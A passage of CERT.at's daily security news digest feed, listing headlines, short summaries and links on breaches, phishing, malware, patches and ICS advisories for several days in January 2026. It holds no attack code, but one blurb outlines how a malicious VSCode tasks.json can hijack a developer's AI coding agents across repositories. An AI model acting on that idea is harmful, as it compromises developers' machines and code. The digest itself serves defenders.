&lt;h3&gt;149 Million Usernames and Passwords Exposed by Unsecured Database&lt;/h3&gt;

This &quot;dream wish list for criminals&quot; includes millions of Gmail, Facebook, banking logins, and more. The researcher who discovered it suspects they were collected using infostealing malware.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.wired.com/story/149-million-stolen-usernames-passwords/&quot;&gt;https://www.wired.com/story/149-million-stolen-usernames-passwords/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;URL fritz.box has been redirecting to 91.195.240.12 since 22.1.2026&lt;/h3&gt;

The domain fritz.box, acquired by the former AVM, now FRITZ, has apparently gone &quot;astray&quot; again. [..] The Whois data shows that the domain registration expired today (22.1.2026).
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/01/22/url-fritz-box-leitet-seit-22-1-2026-auf-91-195-240-12-um/&quot;&gt;https://borncity.com/blog/2026/01/22/url-fritz-box-leitet-seit-22-1-2026-auf-91-195-240-12-um/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;AI and security: zero-day exploits by AI are already a reality&lt;/h3&gt;

A study shows that AIs can create complex zero-day exploits. As a result, the search for security vulnerabilities is being successfully industrialised and scaled.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11151838&quot;&gt;https://heise.de/-11151838&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Exploit Cursor Agents to create persistent, distributed threats&lt;/h3&gt;

Yesterday a VSCode exploit was written up. When a programmer simply opens a folder that contains a malicious tasks.json file, the malicious code will silently run from inside the editor itself - where all their work lives. That got me thinking: could I use this to re-program a developer's AI agents and get them to do what I want? Even worse - could I do this to all their code repositories? Turns out: hell yes.
&lt;p /&gt;
&lt;A HREF=&quot;https://ike.io/open-a-folder-all-your-agents-are-mine/&quot;&gt;https://ike.io/open-a-folder-all-your-agents-are-mine/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security updates for Friday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (kernel), Debian (bind9, chromium, osslsigncode, and python-urllib3), Fedora (freerdp, ghostscript, hcloud, rclone, rust-rkyv0.7, rust-rkyv_derive0.7, and vsftpd), Mageia (avahi and harfbuzz), SUSE (alloy, avahi, busybox, cargo-c, corepack22, corepack24, curl, docker, dpdk, exiv2-0_26, ffmpeg-4, firefox, glib2, go1.24, go1.25, gpg2, haproxy, kernel, kernel-firmware, keylime, libpng16, librsvg, libsodium, libsoup, libsoup2, libtasn1, log4j, net-snmp, open-vm-tools, openldap2_5, ovmf, pgadmin4, php7, podman, python-filelock, python-marshmallow, python-pyasn1, python-tornado, python-urllib3, python-virtualenv, python3, python311-pyasn1, python311-weasyprint, rust1.91, rust1.92, util-linux, webkit2gtk3, and wireshark), and Ubuntu (libxml2 and pyasn1).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1055671/&quot;&gt;https://lwn.net/Articles/1055671/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Video conferencing software: Zoom Node a possible entry point for malicious code attacks&lt;/h3&gt;

In an advisory, the developers state that the now-closed security vulnerability (CVE-2026-22844) is rated with the threat level &quot;critical&quot;. The vulnerability specifically affects the Multimedia Routers (MMRs) component. For an attack to succeed, the attacker must be a participant in a meeting. If that is the case, they can execute malicious code in a manner that is not described in further detail.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11151434&quot;&gt;https://heise.de/-11151434&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Rockwell Automation CompactLogix 5370&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-03&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-03&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Schneider Electric EcoStruxure Process Expert&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-01&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-01&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;EVMAPA&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Weintek cMT X Series HMI EasyWeb Service&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-05&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-05&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Delta Electronics DIAView&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-07&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-07&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Johnson Controls Inc. iSTAR Configuration Utility (ICU) tool&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-04&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-04&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;AutomationDirect CLICK Programmable Logic Controller&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-02&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-02&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hubitat Elevation Hubs&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-06&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-06&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-23T18:25:27Z</dc:date></entry><entry><title>Tageszusammenfassung - 22.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-22012026"/><author><name>CERT.at</name></author><updated>2026-01-22T18:11:51Z</updated><published>2026-01-22T18:11:51Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Wednesday 21-01-2026 18:00 - Thursday 22-01-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Guenes Holler


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;A patch for the NIS2 Directive&lt;/h3&gt;

On January 20th, 2026 the EU Commission presented a package of legislative proposals, including an update to the NIS2 directive.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/en/blog/2026/1/a-patch-for-the-nis2-directive&quot;&gt;https://www.cert.at/en/blog/2026/1/a-patch-for-the-nis2-directive&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Look at FortiCloud SSO Bypass Exploitation (CVE-2025-59718/59719)&lt;/h3&gt;

In December last year, Fortinet disclosed [1] a vulnerability in SAML processing, which allowed full bypass of authentication to management interfaces with FortiCloud SSO enabled. According to new, still not officially confirmed reports, the vulnerability may not have been fully patched [10]. As affected devices are represented in my small high-interactive honeypots network, we have an opportunity to take a look at what the attackers do.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/en/blog/2026/1/look-at-forticloud-sso-bypass-exploitation&quot;&gt;https://www.cert.at/en/blog/2026/1/look-at-forticloud-sso-bypass-exploitation&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New Android malware uses AI to click on hidden browser ads&lt;/h3&gt;

A new family of Android click-fraud trojans leverages TensorFlow machine learning models to automatically detect and interact with specific advertisement elements.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/new-android-malware-uses-ai-to-click-on-hidden-browser-ads/&quot;&gt;https://www.bleepingcomputer.com/news/security/new-android-malware-uses-ai-to-click-on-hidden-browser-ads/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Chainlit AI framework bugs let hackers breach cloud environments&lt;/h3&gt;

Two high-severity vulnerabilities in Chainlit, a popular open-source framework for building conversational AI applications, allow reading any file on the server and leaking sensitive information.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/chainlit-ai-framework-bugs-let-hackers-breach-cloud-environments/&quot;&gt;https://www.bleepingcomputer.com/news/security/chainlit-ai-framework-bugs-let-hackers-breach-cloud-environments/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Is AI-Generated Code Secure?, (Thu, Jan 22nd)&lt;/h3&gt;

The title of this diary is perhaps a bit catchy but the question is important. I don't consider myself as a good developer. That's not my day job and I'm writing code to improve my daily tasks. I like to say &quot;I'm writing sh*ty code! It works for me, no warranty that it will work for you&quot;. Today, most of my code (the skeleton of the program) is generated by AI, probably like most of you.
&lt;p /&gt;
&lt;A HREF=&quot;https://isc.sans.edu/diary/rss/32648&quot;&gt;https://isc.sans.edu/diary/rss/32648&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious PyPI Package Impersonates SymPy, Deploys XMRig Miner on Linux Hosts&lt;/h3&gt;

A new malicious package discovered in the Python Package Index (PyPI) has been found to impersonate a popular library for symbolic mathematics to deploy malicious payloads, including a cryptocurrency miner, on Linux hosts.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/malicious-pypi-package-impersonates.html&quot;&gt;https://thehackernews.com/2026/01/malicious-pypi-package-impersonates.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Preparing for the EU Cyber Resilience Act (CRA)&lt;/h3&gt;

Product security has matured significantly over the last decade. Secure defaults, defined ownership of security risk, reliable update mechanisms, and structured vulnerability handling are now mainstream and well understood by experienced engineering and security teams. These practices are no longer aspirational. They are now the minimum required to build and operate digital products responsibly.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.pentestpartners.com/security-blog/preparing-for-the-eu-cyber-resilience-act-cra/&quot;&gt;https://www.pentestpartners.com/security-blog/preparing-for-the-eu-cyber-resilience-act-cra/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Phishing trap: loss of access to ChatGPT&lt;/h3&gt;

A phishing e-mail currently circulating warns of the termination of the recipient's ChatGPT account. The supposed reason is a missed payment. The problem could allegedly be resolved by updating the necessary details. Anyone who follows the corresponding path, however, hands over credit card and contact information to the criminals.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/phishing-falle-chatgpt/&quot;&gt;https://www.watchlist-internet.at/news/phishing-falle-chatgpt/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;European Space Agency's cybersecurity in freefall as yet another breach exposes spacecraft and mission data&lt;/h3&gt;

It has just been a few weeks since reports emerged of the Christmas cyber attack suffered by the European Space Agency (ESA), and the situation has already become worse.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bitdefender.com/en-us/blog/hotforsecurity/european-space-agencys-cybersecurity-in-freefall-as-yet-another-breach-exposes-spacecraft-and-mission-data&quot;&gt;https://www.bitdefender.com/en-us/blog/hotforsecurity/european-space-agencys-cybersecurity-in-freefall-as-yet-another-breach-exposes-spacecraft-and-mission-data&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time&lt;/h3&gt;

Imagine visiting a webpage that looks perfectly safe. It has no malicious code, no suspicious links. Yet, within seconds, it transforms into a personalized phishing page.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/&quot;&gt;https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Osiris: New Ransomware, Experienced Attackers?&lt;/h3&gt;

Poortry driver and modified Rustdesk tool used in recent attack campaign, which bears similarities to previous Inc ransomware attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.security.com/threat-intelligence/new-ransomware-osiris&quot;&gt;https://www.security.com/threat-intelligence/new-ransomware-osiris&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Watering Hole Attack Targets EmEditor Users with Information-Stealing Malware&lt;/h3&gt;

TrendAI Research provides a technical analysis of a compromised EmEditor installer used to deliver multistage malware that performs a range of malicious actions.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.trendmicro.com/en_us/research/26/a/watering-hole-attack-targets-emeditor-users.html&quot;&gt;https://www.trendmicro.com/en_us/research/26/a/watering-hole-attack-targets-emeditor-users.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cyber Is What We Make of It&lt;/h3&gt;

&quot;It's not what happens to you, but how you react to it that matters.&quot; - Epictetus. Not long ago an Atlantic Council op-ed in CyberScoop outlined ten key reforms to close America's cybersecurity gaps. The recommendations are sensible: migrate to memory-safe languages, apply formal verification to critical systems, establish zero trust architectures, build data resilience, conduct proactive threat hunting. Laudable, uncontroversial, and comprehensive;
&lt;p /&gt;
&lt;A HREF=&quot;https://buttondown.com/grugq/archive/cyber-is-what-we-make-of-it/&quot;&gt;https://buttondown.com/grugq/archive/cyber-is-what-we-make-of-it/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release&lt;/h3&gt;

A new security flaw in SmarterTools SmarterMail email software has come under active exploitation in the wild, two days after the release of a patch.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/smartermail-auth-bypass-exploited-in.html&quot;&gt;https://thehackernews.com/2026/01/smartermail-auth-bypass-exploited-in.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Thursday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (gpsd), Debian (inetutils and modsecurity-crs), Fedora (cpp-httplib, curl, mariadb11.8, mingw-libtasn1, mingw-libxslt, mingw-python3, rclone, and rpki-client), Oracle (gimp, glib2, go-toolset:rhel8, golang, kernel, mariadb-devel:10.3, and thunderbird), Red Hat (buildah, go-toolset:rhel8, golang, grafana, kernel, kernel-rt, multiple packages, openssl, osbuild-composer, podman, and skopeo), Slackware (bind), SUSE (ffmpeg-4, libsodium, libvirt, net-snmp, open-vm-tools, ovmf, postgresql17, postgresql18, python-FontTools, python-weasyprint, and webkit2gtk3), and Ubuntu (glib2.0 and opencc).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1055484/&quot;&gt;https://lwn.net/Articles/1055484/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Act now! Attackers apparently bypass Fortinet security patch&lt;/h3&gt;

According to media reports, a security patch for various Fortinet products is broken. Admins can nevertheless still protect their instances.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11149777&quot;&gt;https://heise.de/-11149777&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Update now! Attack attempts on security vulnerabilities in Cisco Unified Communications&lt;/h3&gt;

Several Cisco Unified Communications products contain a security vulnerability that allows unauthenticated attackers to inject malicious code from the network and execute it with root privileges. Admins should promptly apply the available updates, as Cisco has already observed attack attempts on the vulnerability from the network.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11149877&quot;&gt;https://heise.de/-11149877&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Dell Data Protection Advisor attackable via countless security vulnerabilities&lt;/h3&gt;

Dell is closing vulnerabilities in Data Protection Advisor, some of them sixteen years old, through which attackers can compromise systems.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11150421&quot;&gt;https://heise.de/-11150421&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;SSA-864900 V1.6 (Last Update: 2026-01-22): Multiple Vulnerabilities in Fortigate NGFW on RUGGEDCOM APE1808 Devices&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://cert-portal.siemens.com/productcert/html/ssa-864900.html&quot;&gt;https://cert-portal.siemens.com/productcert/html/ssa-864900.html&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-22T18:11:51Z</dc:date></entry><entry><title>Tageszusammenfassung - 21.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-21012026"/><author><name>CERT.at</name></author><updated>2026-01-21T18:41:58Z</updated><published>2026-01-21T18:41:58Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Tuesday 20-01-2026 18:00 - Wednesday 21-01-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Guenes Holler


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;EU plans cybersecurity overhaul to block foreign high-risk suppliers&lt;/h3&gt;

The European Commission has proposed new cybersecurity legislation mandating the removal of high-risk suppliers to secure telecommunications networks and strengthening defenses against state-backed and cybercrime groups targeting critical infrastructure.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/eu-plans-cybersecurity-overhaul-to-block-foreign-high-risk-suppliers/&quot;&gt;https://www.bleepingcomputer.com/news/security/eu-plans-cybersecurity-overhaul-to-block-foreign-high-risk-suppliers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VoidLink cloud malware shows clear signs of being AI-generated&lt;/h3&gt;

The recently discovered cloud-focused VoidLink malware framework is believed to have been developed by a single person with the help of an artificial intelligence model.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/voidlink-cloud-malware-shows-clear-signs-of-being-ai-generated/&quot;&gt;https://www.bleepingcomputer.com/news/security/voidlink-cloud-malware-shows-clear-signs-of-being-ai-generated/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hackers exploit security testing apps to breach Fortune 500 firms&lt;/h3&gt;

Threat actors are exploiting misconfigured web applications used for security training and internal penetration testing, such as DVWA, OWASP Juice Shop, Hackazon, and bWAPP, to gain access to cloud environments of Fortune 500 companies and security vendors.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hackers-exploit-security-testing-apps-to-breach-fortune-500-firms/&quot;&gt;https://www.bleepingcomputer.com/news/security/hackers-exploit-security-testing-apps-to-breach-fortune-500-firms/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Mass Spam Attacks Leverage Zendesk Instances&lt;/h3&gt;

The CRM vendor advised ignoring or deleting suspicious emails and said the attacks were not tied to any breach or software vulnerability.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/threat-intelligence/mass-spam-attacks-zendesk-instances&quot;&gt;https://www.darkreading.com/threat-intelligence/mass-spam-attacks-zendesk-instances&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Shut it down now: Ten-year-old telnetd flaw makes every client root&lt;/h3&gt;

Since 2015, any client has been able to obtain root access via telnetd. A patch exists, but disabling the service is the recommended course of action.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/jetzt-abschalten-zehn-jahre-alte-telnetd-luecke-macht-jeden-client-zum-root-2601-204433.html&quot;&gt;https://www.golem.de/news/jetzt-abschalten-zehn-jahre-alte-telnetd-luecke-macht-jeden-client-zum-root-2601-204433.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LastPass Warns of Fake Maintenance Messages Targeting Users' Master Passwords&lt;/h3&gt;

LastPass is alerting users to a new active phishing campaign that's impersonating the password management service, which aims to trick users into giving up their master passwords.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/lastpass-warns-of-fake-maintenance.html&quot;&gt;https://thehackernews.com/2026/01/lastpass-warns-of-fake-maintenance.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Curl shutters bug bounty program to remove incentive for submitting AI slop&lt;/h3&gt;

The maintainer of popular open-source data transfer tool cURL has ended the project's bug bounty program after maintainers struggled to assess a flood of AI-generated contributions.
&lt;p /&gt;
&lt;A HREF=&quot;https://go.theregister.com/feed/www.theregister.com/2026/01/21/curl_ends_bug_bounty/&quot;&gt;https://go.theregister.com/feed/www.theregister.com/2026/01/21/curl_ends_bug_bounty/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Restricted ad delivery on Facebook? Business profiles targeted by criminals&lt;/h3&gt;

Using e-mails that appear to come from the Meta group, fraudsters try to gain access to business accounts. For this purpose they have built a fake login page. How exactly does the scam work? How can the fraudulent intent be recognized? This article provides answers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/einschraenkung-der-anzeigenauslieferung-facebook/&quot;&gt;https://www.watchlist-internet.at/news/einschraenkung-der-anzeigenauslieferung-facebook/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;DNS OverDoS: Are Private Endpoints Too Private?&lt;/h3&gt;

We discovered an aspect of Azure's Private Endpoint architecture that could expose Azure resources to denial of service (DoS) attacks. In this article, we explore how both intentional and inadvertent acts could result in limited access to Azure resources through the Azure Private Link mechanism. We uncovered this issue while investigating irregular behavior in Azure test environments.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/dos-attacks-and-azure-private-endpoint/&quot;&gt;https://unit42.paloaltonetworks.com/dos-attacks-and-azure-private-endpoint/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;IT security: Hotline between Beijing and London&lt;/h3&gt;

A new, secret forum is intended to improve communication between British and Chinese intelligence services. It could be the first of its kind.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11148209&quot;&gt;https://heise.de/-11148209&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Introducing &gt; PowerShell.Exposed&lt;/h3&gt;

PowerShell (PS) isn't just a &quot;Windows admin tool.&quot; Once shell access is established, this is the cheapest and most powerful hands-on-keyboard control an attacker can have.
&lt;p /&gt;
&lt;A HREF=&quot;https://detect.fyi/introducing-powershell-exposed-4974fe712117?source=rssd5fd8f494f6a4&quot;&gt;https://detect.fyi/introducing-powershell-exposed-4974fe712117?source=rssd5fd8f494f6a4&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New EU Vulnerability Platform GCVE Goes Live, Reducing Reliance on Global Systems&lt;/h3&gt;

Europe's long-running conversation about digital autonomy quietly crossed a milestone with the launch of a new public vulnerability platform. The EU Vulnerability Database, created under the GCVE initiative, is now live. This signals a deliberate shift in how software weaknesses are identified, cataloged, and shared across Europe.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/eu-launches-gcve-vulnerability-database/&quot;&gt;https://thecyberexpress.com/eu-launches-gcve-vulnerability-database/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical Vulnerability in Advanced Custom Fields: Extended Plugin Puts 100,000 WordPress Sites at Risk&lt;/h3&gt;

A critical security flaw has been discovered in a widely used ACF add-on plugin for WordPress, placing up to 100,000 websites at risk of a full site takeover. The vulnerability affects the Advanced Custom Fields: Extended plugin, an add-on designed to extend the functionality of the popular Advanced Custom Fields ecosystem. An advisory issued about the flaw assigns a severity rating of 9.8, emphasizing the serious impact it can have if exploited.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/acf-add-on-vulnerability-wordpress/&quot;&gt;https://thecyberexpress.com/acf-add-on-vulnerability-wordpress/&lt;/a&gt;

&lt;hr&gt;


&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Current wave of attacks against CVE-2025-59718, patches insufficient&lt;/h3&gt;

In December of last year, Fortinet published information about a login bypass in several of the company's products (see also our warning of 19.12.2025) and at the same time provided patches that were supposed to fix the problem.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/de/aktuelles/2026/1/aktuelle-angriffswelle-gegen-cve-2025-59718-patch-unzureichend&quot;&gt;https://www.cert.at/de/aktuelles/2026/1/aktuelle-angriffswelle-gegen-cve-2025-59718-patch-unzureichend&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;GitLab Patch Release: 18.8.2, 18.7.2, 18.6.4&lt;/h3&gt;

Learn more about GitLab Patch Release: 18.8.2, 18.7.2, 18.6.4 for GitLab Community Edition (CE) and Enterprise Edition (EE).
&lt;p /&gt;
&lt;A HREF=&quot;https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/#cve-2026-0723unchecked-return-value-issue-in-authentication-services-impacts-gitlab-ceee&quot;&gt;https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/#cve-2026-0723unchecked-return-value-issue-in-authentication-services-impacts-gitlab-ceee&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security vulnerabilities: Nvidia CUDA Toolkit lets malicious code through&lt;/h3&gt;

Nvidia's CUDA programming interface contains security vulnerabilities that, among other things, allow malicious code to reach affected systems. Depending on the vulnerability, Linux and Windows are affected. A fixed release of the CUDA Toolkit provides a remedy.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Sicherheitsluecken-Nvidia-CUDA-Toolkit-laesst-Schadcode-passieren-11148301.html&quot;&gt;https://www.heise.de/news/Sicherheitsluecken-Nvidia-CUDA-Toolkit-laesst-Schadcode-passieren-11148301.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security patches: Atlassian secures Confluence &amp; Co. against possible attacks&lt;/h3&gt;

Atlassian has released important security updates for Bamboo, Bitbucket, Confluence, Crowd, Jira and Jira Service Management Data Center and Server. After successful attacks, attackers can primarily trigger DoS conditions and thus crashes.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Sicherheitspatches-Atlassian-sichert-Confluence-Co-gegen-moegliche-Attacken-11149011.html&quot;&gt;https://www.heise.de/news/Sicherheitspatches-Atlassian-sichert-Confluence-Co-gegen-moegliche-Attacken-11149011.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Wednesday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (brotli and container-tools:rhel8), Debian (python-keystonemiddleware and python3.9), Fedora (cef, freerdp, golang-github-tetratelabs-wazero, and libpcap), Oracle (brotli, gpsd, kernel, and transfig), Red Hat (freerdp, golang, java-11-openjdk with Extended Lifecycle Support, libpng, libssh, mingw-libpng, and runc), SUSE (abseil-cpp, alloy, apache2, bind, cpp-httplib, curl, erlang, firefox, gpg2, grafana, haproxy, hauler, hawk2, libblkid-devel, libpng16, libraylib550, python-keystonemiddleware-doc, python-uv, python-weasyprint, squid, and tomcat), and Ubuntu (crawl and iperf3).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1055322/&quot;&gt;https://lwn.net/Articles/1055322/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VU#458022: Open5GS WebUI uses hard-coded secrets including JSON Web Token signing key&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://kb.cert.org/vuls/id/458022&quot;&gt;https://kb.cert.org/vuls/id/458022&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VU#102648: Code Injection Vulnerability in binary-parser library&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://kb.cert.org/vuls/id/102648&quot;&gt;https://kb.cert.org/vuls/id/102648&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VU#481830: libheif Uncompressed Codec Lacks Bounds Check Leading to Application Crash&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://kb.cert.org/vuls/id/481830&quot;&gt;https://kb.cert.org/vuls/id/481830&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Oracle Critical Patch Update Advisory - January 2026&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.oracle.com/security-alerts/cpujan2026.html&quot;&gt;https://www.oracle.com/security-alerts/cpujan2026.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cisco Unified Communications Products Remote Code Execution Vulnerability&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voice-rce-mORhqY4b&quot;&gt;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voice-rce-mORhqY4b&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Schneider Electric EcoStruxure Foxboro DCS&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-020-01&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-020-01&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Rockwell Automation Verve Asset Manager&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-020-03&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-020-03&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Schneider Electric devices using CODESYS Runtime&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-020-02&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-020-02&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-21T18:41:58Z</dc:date></entry><entry><title>Tageszusammenfassung - 20.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-20012026"/><author><name>CERT.at</name></author><updated>2026-01-20T18:31:21Z</updated><published>2026-01-20T18:31:21Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Monday 19-01-2026 18:00 - Tuesday 20-01-2026 18:00
Handler:     Guenes Holler
